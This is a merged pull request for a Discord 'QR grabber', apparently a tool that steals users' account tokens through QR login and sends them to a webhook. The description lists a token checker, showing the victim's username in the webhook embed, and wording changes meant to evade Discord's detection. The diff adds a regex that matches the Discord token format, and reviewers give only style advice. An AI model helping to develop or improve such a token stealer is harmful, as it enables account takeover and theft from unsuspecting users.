### PR TITLE
update qr grabber.py : lots of stuff read description

### PR DESCRIPTION
**Pull request by mte0**
cleaned imports, added token checker, now shows token's username in webhook embed, changed text from webhook to avoid being detected by discord

### CODE REVIEW

File: QR-dtg.py [hunk 1]
```diff
@@ -101,10 +95,24 @@ def main(webhook_url) -> None:
 
 {Fore.LIGHTYELLOW_EX}Enter anything to exit\n>>> {Fore.LIGHTWHITE_EX}""", 
 end="")
+
+            if re.search("[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", token) == None:
```
Comment (TheGamer456YT) [inline QR-dtg.py:99]: Maybe change this to `if not re.search("[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", token):`?

Comment (mte0) [reply QR-dtg.py:99]: Does the same thing, re.search returns None if there is no match, but thats up to u :)

Comment (TheGamer456YT) [reply QR-dtg.py:99]: yeah I know that it does the same thing, it's just to improve readability :)

Comment (TheGamer456YT) [reply QR-dtg.py:99]: also as a rule of thumb, it's better to use "something is None" than "something == None"

**Pull request merged**